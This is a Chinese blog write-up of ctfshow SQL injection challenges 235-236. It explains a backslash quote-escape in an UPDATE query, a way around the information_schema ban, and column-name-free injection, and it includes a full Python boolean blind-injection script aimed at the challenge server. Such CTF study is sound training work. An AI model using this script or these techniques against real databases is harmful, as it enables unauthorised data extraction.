ctfshow sql235-236_updata_ban-infomation表_无列名注入

于 2021-10-08 20:42:51 发布
阅读量1.7k 收藏
点赞数
分类专栏: web安全 CTF_WEB 文章标签: mysql 数据库 python web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48083470/article/details/120658535
版权

updata_ban-infomation表_无列名注入

updata

在这里插入图片描述
过滤了引号,用反斜杠 \ 注释掉password 后面的引号,那么username就能为我们控制
有用字符串的地方可以用 16 进制表示

ban-infomation表

很简单的无列名注入
首先是ban了information表,可以有很多其他表代替,得到数据库中的表名
Bypass information_schema与无列名注入
概述MySQL统计信息

mysql.innodb_table_stats和mysql.innodb_index_stats
这两个表比较好用,可以用自己的mysql试一下
得到了表名,下面就无法得到列名了,其他表没有column的信息

无列名注入

这里我拿这个users表举例
在这里插入图片描述
我们只知道表名 users,我们可以使用这样的一个联合查询,可以看到他的列名就会变成数字
我们还需要知道他的列数才行
在这里插入图片描述
之后我们要查哪一列信息,就可以用数字
注意:数字要用反引号
意思就是 把后面union查询的结果当一个表 注意要起别名 例如我后面这个 a
在这里插入图片描述
反引号不能用时:
在这里插入图片描述

布尔注入脚本

import requests
import random
url = 'http://e6ee800c-7aca-4c5d-863b-7694aafc6bfb.challenge.ctf.show:8080/api/index.php'

database = 'database()'

databases = 'select group_concat(schema_name) from information_schema.schemata'

tables = 'select group_concat(table_name) from mysql.innodb_index_stats where database_name=database()'

column = 'select group_concat(column_name) from information_schema.columns where table_name=0x666c616761'

flag="select group_concat(concat(`1`,`2`,`3`)) from (select 1,2,3 union select * from flaga) a "
#ctfshow{b2b18bea-dc4a-4ff5-a0d3-1256b3d4c370}
sql_in = 'sql inject error'
result = ""  # 结果
judge = "u6210"  # 判断
m=random.randint(1,100000)
for i in range(1, 100):
    l = 33
    r = 130
    mid = (l + r) >> 1
    while (l < r):
        payload = { #过滤了单引号
            'username':"where username=0x7573657231 and ascii(substr(({}),{},1))>{}#".format(flag,i,mid),
            'password':str(m)+'\\'
        }
        html = requests.post(url, data=payload)
        #print(html.text,mid)
        if sql_in in html.text:
            print('error!!')
            break
        if judge in html.text:
            l = mid + 1
            m = random.randint(1, 100000)
        else:
            r = mid
        mid = (l + r) >> 1
        # if (chr(mid) == " "):
        #     break
    if result[-1] == '!':
        break
    result = result + chr(mid)

    print(result)
print("result: ", result)

当union被过滤了

在这里插入图片描述

首先可以通过两列数据的比大小来确定列数
在这里插入图片描述
在这里插入图片描述
说明有三列数据

然后还是数据比大小来确定数据内容
在这里插入图片描述

236

过滤了flag 用 16进制表示 代替,其他同上

无限键制
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4678
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
information_schema数据库SQL注入中的应用.docx
06-11
SQL 注入攻击中,信息架构数据库中的三张重要的:schemata、tables 和 columns,扮演着关键的角色。 Schemata ------------- Schemata 提供了当前 MySQL 数据库中所有数据库的信息,其中 SCHEMA_NAME ...
CTFSHOW-WEB详解
qq_49422880的博客
05-25 4830
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
CTFshow-WEB入门-反序列化
feng的博客
02-14 5536
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4638
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2057
web227 按照上一题的方法,发现查不出flag了,把ctfshow_user给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
Oracle-SQL.rar_oracle_oracle sql_sql
最新发布
09-24
`用于插入数据,`UPDATE 名 SET 列名 = 新值 WHERE 条件;`用于更新数据,`DELETE FROM 名 WHERE 条件;`用于删除数据。 6. **索引和优化查询**:索引可以显著提高查询速度,`CREATE INDEX 索引名 ON 名 (列名)...
db2-sql-command.rar_sql command
09-14
本资源“db2-sql-command.rar”包含了一份关于DB2 SQL基本命令的文档,旨在帮助用户进行数据查询、操作和管理。 一、SQL命令概述 SQL命令大致分为四大类:数据查询语言(DQL)、数据操作语言(DML)、数据定义语言...
SQLServer_2000-2008_R2查询智能分析器RedGate_SQL_Prompt_V5.3.4.1_Crack_Keygen破解教程注册机免费
09-08
在我个人编写SQL脚本时,至少会把SQL的格式排列成易于阅读的,因为其他人会阅读到你的SQL,无论是在程序中或是脚本文件中,良好的排版不仅让人看起来赏心悦目,在和他人之间做交流时也省时省力,不会因为揉成一团的...
php连接sqlserver驱动 -- php_dblib.dll
07-28
php(thinkphp)连接sqlserver(2008)驱动,具体配置步骤 http://blog.csdn.net/hanzengyi/article/details/52054862
网上看的轮播代码
choudengze3695的博客
03-19 87
<script type="text/javascript"> var t = n = 0, count; $(document).ready(function(){ count=$("#ban_list a").length;//获取图片数目 ...
sql中常见sqlcode原因分析
热门推荐
zhh0921的博客
09-20 3万+
000 | 00000 | SQL语句成功完成  01xxx | SQL语句成功完成,但是有警告  +012 | 01545 | 未限定的列名被解释为一个有相互关系的引用  +098 | 01568 | 动态SQL语句用分号结束  +100 | 02000 | 没有找到满足SQL语句的行  +110 | 01561 | 用DATA CAPTURE定义的的更新操作不能发送到原来的子系统
[CTFSHOW]SQL注入训练
Y4tacker的博客
11-02 1402
文章目录web171web172web173方法一方法二 web171 普通的sql注入,不做讲解 payload:1' union select id,username,password from ctfshow_user1 -- - web172 普通的sql注入,不做讲解 payload:1' union select id,username,password from ctfshow_user2 -- - web173 方法一 过滤了带有flag的输出,可以转换为16进制输出 1' union se
DNSlog注入 信息的 带外|外带 sql注入利用详解+实操
weixin_48083470的博客
08-04 3841
DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 s
ctfshow web224 sql_文件上传产生sql注入 详解
weixin_48083470的博客
10-04 2432
sql_文件上传产生注入 首先是扫描 或者 直觉检查 有个robots.txt 访问这个页面 发现可以重置密码,重置后admin登录,是个文件上传 测试下来不是文件上传的漏洞,题目也是提示的sql 我这里建了个bmp的文件可以成功上传 上传后发现 有两个参数 filename 和 filetype filename 会被重命名 filetype 应该就是不动 这两个应该是会存入数据库,产生注入 那么就是insert,那么就考了堆叠注入 思路到这就没了 改变http报文是改不了filetype的 应该是
DVWA更改不了安全等级,一直卡在一个等级
weixin_48083470的博客
05-29 2083
关于DVWA更改不了安全等级,一直卡在一个等级 今天在DVWA平台做实验,出现了问题,换不到想要的安全等级: 自己动手找找问题,他是通过传参数来确定等级的,那就用burpsuite抓一下看看 当你把这个安全等级删了再发出去,会发现到了high这个页面。。。。。 这个多出来的安全等级cookie也不知道哪里来的,页面每次刷新都会自动加上去。。。。 浏览器的cookie缓存清空了也还是会这样 如果有大佬看到知道怎么回事的希望能指点一下 解决办法 上面删除的方法太麻烦了,而且对于盲注high的分页注入
upload-labs+哥斯拉webshell的使用
weixin_48083470的博客
05-31 1989
upload-labs 本实验使用哥斯拉webshell管理工具,工具我上传了资源 pass-01 文件上传漏洞主要是要上传一句话到服务器,然后得到他的权限 例如使用哥斯拉生成这句php代码,或者自己写php代码 之后就是要想办法把这个一句话传到服务器上 直接上传会有检测,查看网页源代码发现检测在前端 通过burp suite抓包,修改后缀名 forword发送 成功上传 然后就是找到上传后存在哪里 上传后发现页面有加载显示 查看源代码 发现存储路径 通过哥斯拉连接webshell,目标-
sqli-labs buuctf平台+本地环境 全关全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1896
sqli-labs 在buuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值